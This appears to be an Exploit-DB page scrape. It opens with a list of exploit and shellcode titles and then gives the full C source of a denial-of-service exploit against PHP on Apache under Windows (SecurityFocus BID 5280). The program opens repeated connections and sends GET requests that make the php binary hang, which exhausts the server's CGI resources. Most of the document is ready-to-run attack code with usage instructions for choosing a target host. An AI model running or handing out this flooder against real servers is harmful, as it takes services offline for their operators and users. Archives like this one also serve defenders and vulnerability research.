880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
167 lines
No EOL
4.7 KiB
C
167 lines
No EOL
4.7 KiB
C
// source: https://www.securityfocus.com/bid/5280/info
|
|
|
|
It is possible, under some circumstances, for remote attackers to invoke the PHP interpreter from the web. If the interpreter is invoked with no command line options, it will hang. Attackers may exploit this condition to cause a denial of service.
|
|
|
|
This is reported to be a problem with PHP and Apache on Microsoft Windows platforms. It may be possible to create this condition in other environments as well.
|
|
|
|
|
|
/* PHP-APACHE.C
|
|
* By Matthew Murphy
|
|
* Exhaust CGI Resources via PHP on Apache
|
|
*
|
|
* Calling PHP with no parameters causes it to
|
|
* never terminate; the process must be killed
|
|
* by the server, the OS, or the admin.
|
|
*
|
|
* PHP on Apache requires you to configure a
|
|
* virtual to load PHP out of. PHP implements
|
|
* a "cgi.force_redirect" value to require that
|
|
* a certain environment variable be set to
|
|
* allow PHP to run further.
|
|
*
|
|
* However, an empty command-line *still* will
|
|
* cause PHP to hang. If a remote user does
|
|
* this for a lengthy amount of time, the server
|
|
* may no longer launch PHP or other server-side
|
|
* components.
|
|
*
|
|
* NOTE: The vulnerable config is on Apache,
|
|
* but other servers can still be exploited
|
|
* if they offer PHP.EXE (or an SAPI) directly.
|
|
*
|
|
* Usage: php-apache <host> [phpbin] [port] [maxsocks]
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
#ifdef _WIN32
|
|
#define _WINSOCKAPI_ /* Fix for Winsock.h redef errors
|
|
*/
|
|
#include <winsock2.h> /* WinSock API calls... */
|
|
#define WSA_VER 0x0101 /* WinSock ver. to use */
|
|
#pragma comment(lib, "wsock32.lib") /* Check your compiler's docs...
|
|
*/
|
|
#else
|
|
#include <signal.h>
|
|
#include <netdb.h>
|
|
#include <sys/types.h>
|
|
#include <sys/time.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/tcp.h>
|
|
#endif
|
|
|
|
#define DEF_PHP "/php/php" /* This is used as the PHP
|
|
* path if one isn't set
|
|
*/
|
|
|
|
static char php_buf[] = "GET %s HTTP/1.0\x0d\x0a\x0d\x0a";
|
|
|
|
void main(int argc, char *argv[]) {
|
|
char host[257];
|
|
char binpath[257];
|
|
int maxsocks;
|
|
char request[300];
|
|
unsigned short port;
|
|
struct hostent *he;
|
|
struct sockaddr_in sa_in;
|
|
#ifdef _WIN32
|
|
WSADATA wsa_prov;
|
|
SOCKET s;
|
|
#else
|
|
int s;
|
|
#endif
|
|
printf("PHP-APACHE.C by Matthew Murphy\x0d\x0a");
|
|
printf("Exhausting CGI resources w/ PHP on
|
|
Apache\x0d\x0a\x0d\x0a");
|
|
maxsocks = 0;
|
|
strcpy(&binpath[0], DEF_PHP);
|
|
#ifdef _WIN32
|
|
if (!WSAStartup(WSA_VER, &wsa_prov) == 0) {
|
|
printf("ERROR: Windows Sockets init failed!");
|
|
exit(1);
|
|
}
|
|
#endif
|
|
port = (unsigned short)htons(80);
|
|
switch (argc) {
|
|
case 5:
|
|
maxsocks = atoi(argv[4]);
|
|
case 4:
|
|
port = htons((unsigned short)atoi(argv[2]));
|
|
case 3:
|
|
if (strlen(argv[2]) > 256) {
|
|
printf("ERROR: 256 char path limit exceeded in
|
|
'phpbin' argument.");
|
|
exit(1);
|
|
}
|
|
strcpy(&binpath[0], argv[2]);
|
|
case 2:
|
|
if (strlen(argv[1]) > 256) {
|
|
printf("ERROR: No host should be over 256
|
|
chars!");
|
|
exit(1);
|
|
}
|
|
strcpy(&host[0], argv[1]);
|
|
break;
|
|
default:
|
|
printf("Usage: php-apache <host> [port] [maxsocks]
|
|
[phpbin]\x0d\x0a\x0d\x0ahost - The IP/DNS name to attack\x0d\x0aport - The
|
|
port the HTTP service normally runs on (default: 80)\x0d\x0amaxsocks - The
|
|
maximum number of connections to establish (creates a finite flood). A
|
|
zero value means continue until termination (default: 0)\x0d\x0aphpbin -
|
|
The virtual path to the PHP binary (e.g, /php/php[.exe]; default:
|
|
/php/php)");
|
|
exit(0);
|
|
}
|
|
if (maxsocks == 0) {
|
|
maxsocks--;
|
|
}
|
|
sa_in.sin_family = AF_INET;
|
|
sa_in.sin_port = (unsigned short)port;
|
|
he = gethostbyname(&host[0]);
|
|
if (he == NULL) {
|
|
printf("ERROR: DNS resolution failed, or unknown host.");
|
|
exit(1);
|
|
}
|
|
#ifdef _WIN32
|
|
sa_in.sin_addr.S_un.S_addr = (unsigned long)*(unsigned long
|
|
*)he->h_addr;
|
|
#else
|
|
sa_in.sin_addr.S_addr = (unsigned long)*(unsigned long
|
|
*)he->h_addr;
|
|
#endif
|
|
sprintf(&request[0], &php_buf[0], &binpath[0]);
|
|
while (!maxsocks == 0) {
|
|
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
if (s < 0) {
|
|
printf("Couldn't create socket...\x0d\x0aIf you
|
|
continue to receive this error, terminate the program.");
|
|
} else {
|
|
if (!connect(s, (const struct sockaddr FAR
|
|
*)&sa_in, sizeof(struct sockaddr_in)) == 0) {
|
|
printf("Couldn't connect...\x0d\x0aIf you
|
|
continue to receive this error, terminate the program.");
|
|
} else {
|
|
send(s, (char FAR *)&request[0],
|
|
strlen(&request[0]), 0);
|
|
|
|
/* If the exploit isn't using up server resources
|
|
* try removing this -- the server may be killing
|
|
* the CGI after a disconnect.
|
|
*/
|
|
|
|
#ifdef _WIN32
|
|
shutdown(s, SD_BOTH);
|
|
closesocket(s);
|
|
#else
|
|
close(s);
|
|
#endif
|
|
}
|
|
}
|
|
if (!maxsocks == -1) {
|
|
maxsocks--;
|
|
}
|
|
}
|
|
return;
|
|
} |